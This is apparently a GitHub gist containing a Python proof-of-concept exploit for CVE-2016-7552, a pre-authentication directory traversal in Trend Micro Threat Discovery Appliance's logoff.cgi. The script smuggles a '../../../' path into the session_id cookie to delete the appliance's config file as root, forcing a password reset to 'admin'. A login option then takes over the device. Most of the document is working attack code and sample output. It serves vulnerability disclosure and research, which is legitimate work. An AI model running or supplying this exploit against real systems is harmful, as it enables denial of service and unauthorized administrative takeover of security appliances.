CVE-2016-7552 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 logoff.cgi Directory Traversal Authentication Bypass Vulnerability
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/local/bin/python | |
| """ | |
| Trend Micro Threat Discovery Appliance <= 2.6.1062r1 logoff.cgi Directory Traversal Authentication Bypass Vulnerability | |
| Found by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/ | |
| File: TDA_InstallationCD.2.6.1062r1.en_US.iso | |
| sha1: 8da4604c92a944ba8f7744641bce932df008f9f9 | |
| Download: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1 | |
| Summary: | |
| ======== | |
| There exists a pre-authenticated directory traversal vulnerability that allows an attacker to delete any folder or file as root. | |
| This can result in an attacker causing a DoS or bypassing authentication. | |
| Exploitation: | |
| ============= | |
| An attacker can use this vulnerability to bypass the authentication by reseting the default password back to 'admin'. | |
| 1. Delete the config file /opt/TrendMicro/MinorityReport/etc/igsa.conf | |
| 2. Wait for the server to be rebooted... | |
| It is highly likely the server will be rebooted because the deletion of the config file causes a DoS condition whereby | |
| no-body can even login... (since the md5 hashed pw is stored in the config file). | |
| Notes: | |
| ====== | |
| - (Un)fortunately, we were not able to find a pre-authenticated way to reboot the server, hence requiring slight user interaction (or patience) | |
| - No username required! | |
| Example: | |
| ======== | |
| saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py | |
| (+) usage: ./poc.py <target> <option [reset][login]> | |
| (+) eg: ./poc.py 172.16.175.123 reset | |
| (+) eg: ./poc.py 172.16.175.123 login | |
| saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 login | |
| (-) login failed | |
| saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 reset | |
| (+) resetting the default password... | |
| (+) success! now wait for a reboot... | |
| saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 login | |
| (+) logged in... | |
| (+) authenticated session_id: de685c4feec6d698f8165a8af8489df1 | |
| """ | |
| import re | |
| import os | |
| import sys | |
| import time | |
| import requests | |
| import threading | |
| requests.packages.urllib3.disable_warnings() | |
| if len(sys.argv) != 3: | |
| print "(+) usage: %s <target> <option [reset][login]>" % sys.argv[0] | |
| print "(+) eg: %s 172.16.175.123 reset" % sys.argv[0] | |
| print "(+) eg: %s 172.16.175.123 login" % sys.argv[0] | |
| sys.exit(-1) | |
| t = sys.argv[1] | |
| o = sys.argv[2] | |
| bu = "https://%s/" % t | |
| l_url = "%scgi-bin/logon.cgi" % bu | |
| o_url = "%scgi-bin/logoff.cgi" % bu | |
| if o.lower() == "login": | |
| # default password | |
| r = requests.post(l_url, data={ "passwd":"admin", "isCookieEnable":1 }, verify=False) | |
| if "frame.cgi" in r.text: | |
| print "(+) logged in..." | |
| match = re.search("session_id=(.*); path", r.headers['set-cookie']) | |
| if match: | |
| print "(+) authenticated session_id: %s" % match.group(1) | |
| else: | |
| print "(-) login failed" | |
| elif o.lower() == "reset": | |
| print "(+) resetting the default password..." | |
| r = requests.get(o_url, cookies={"session_id":"../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"}, verify=False) | |
| # causes an uninitialized free() vulnerability as well... | |
| if "Memory map" in r.text: | |
| print "(+) success! now wait for a reboot..." | |
| else: | |
| print "(-) not a valid option!" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment